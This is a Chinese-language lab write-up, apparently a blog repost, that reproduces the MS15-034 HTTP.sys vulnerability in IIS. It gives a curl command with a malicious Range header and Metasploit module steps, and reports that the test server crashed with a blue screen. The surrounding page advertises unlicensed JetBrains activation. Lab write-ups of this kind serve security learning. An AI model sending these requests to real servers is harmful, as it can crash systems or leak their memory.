HTTP.SYS远程代码执行漏洞(MS15-034)

HTTP.SYS远程代码执行漏洞(MS15-034)目录简介影响范围危害漏洞复现win2008r2换成win7利用msf简介漏洞编号:CVE-2015-1635(MS15-034)远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。影响范围任何安装了微软IIS6.0以上的WinServer2008R2、Win…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

目录

 

简介

影响范围

危害

漏洞复现

win2008 r2

换成win7

利用msf


简介

漏洞编号:CVE-2015-1635(MS15-034 )

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

影响范围

任何安装了微软IIS 6.0以上的
    Win Server 2008 R2、 
    Win Server 2012、
    Win Server 2012 R2、
    Win 7、
    Win 8、
    Win 8.1

危害

(1)远程读取IIS服务器的内存数据,
(2)使服务器系统蓝屏崩溃。

漏洞复现

win2008 r2

环境:win2008 r2 ,iis7.5

(一)利用curl

curl -v IP -H “Host:irrelevant” -H “Range: bytes=0-18446744073709551615”

用的时候仅仅修改IP就行;这个IP可以是:纯IP、IP加端口号、域名。

如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该有:

 HTTP/1.1 416 Requested Range Not Satisfiable

如果服务器打上了补丁,那么响应状态应该是:

HTTP Error 400. The request has an invalid header name.

HTTP.SYS远程代码执行漏洞(MS15-034)  进行发包,这里并没有成功,不存在这个漏洞

HTTP.SYS远程代码执行漏洞(MS15-034)

 

换成win7

win7安装iis服务 https://jingyan.baidu.com/article/219f4bf723bcb2de442d38ed.html

web界面如下

HTTP.SYS远程代码执行漏洞(MS15-034)

发送数据包,漏洞存在

HTTP.SYS远程代码执行漏洞(MS15-034)

利用msf

search ms 15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts xxx
run

但是这里的状态码并不是  HTTP/1.1 416 Requested Range Not Satisfiable,但还是成功了

服务器瞬间蓝屏然后重启了

HTTP.SYS远程代码执行漏洞(MS15-034)

                                                                                                                                                                                                —— 心,若没有栖息的地方,到哪里都是流浪

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/161405.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • SparkStreaming的介绍及原理

    SparkStreaming的介绍及原理一、SparkStreaming的介绍1.离线和流处理的区别1)离线处理是针对一个批次,这个批次一般情况下都比较大流处理对应的数据是连续不断产生,处理时间间隔非常短的数据2)离线处理程序,因为数据是有限的(bounded),所以会终止流数据因为是连续不断的产生,所以数据是无限的(unbounded)由于数据的特征,一般离线处理比较缓慢,流数据处理相对较快流处理:…

  • arpspoof怎么安装_添加静态arp的命令

    arpspoof怎么安装_添加静态arp的命令安装参考https安装测试安装是否成功arpspoofVersion2.4Usage。

  • Linux常用下载工具推荐「建议收藏」

    Linux常用下载工具推荐「建议收藏」[color="#02368d"]Linux常用下载工具推荐转自:http://doc.zoomquiet.org/data/20060730210451/index.html

  • 复制粘贴网页上的文字有的字粘贴不上_网页无法复制的文字怎么复制

    复制粘贴网页上的文字有的字粘贴不上_网页无法复制的文字怎么复制当你在浏览一些网站时,是否有遇到过无法复制粘贴的情况。看到一篇好的文章,或者一段好的语句,想要复制下来,却发现无法使用复制粘贴功能,这是该网站进行了加密设置。而你又不想屏幕截图再OCR识别,那该怎么办?桌面天下的小编有办法!从浏览器的相关功能下手如果你使用的是IE浏览器的话,我们可以更改其相关设置,屏蔽掉网站的某些功能就能达到目的了。安全设置帮你忙:启动IE→点击菜单“工具”中“Internet选…

    2022年10月13日
  • java贪吃蛇源码

    java贪吃蛇源码java是一种面向对象的语言,有着其中不用质疑的优点。学习java将近三个月了,一直在琢磨着“万物皆对象”的意义,却总是只知其表不知其意,做完这个java贪吃蛇后才有了那么一点的理解。直接上效果图。游戏分为了六个类,分别为:Node类:蛇身都是由一个一个节点组成,所以首先将节点抽象为一个类。Snake类:此类是一条蛇抽象出来的一个类。一种包含了存储节点的LinkedList类型…

  • 771服务器cpu性能排行,CPU114查询网

    771服务器cpu性能排行,CPU114查询网4485083264155WQ4201954736564128225WQ2201964606764128200WQ220197392991632155WQ420198392701632105WQ4201910358722448180WQ420191333158122465WQ2201914318681224105WQ22019183067912246…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号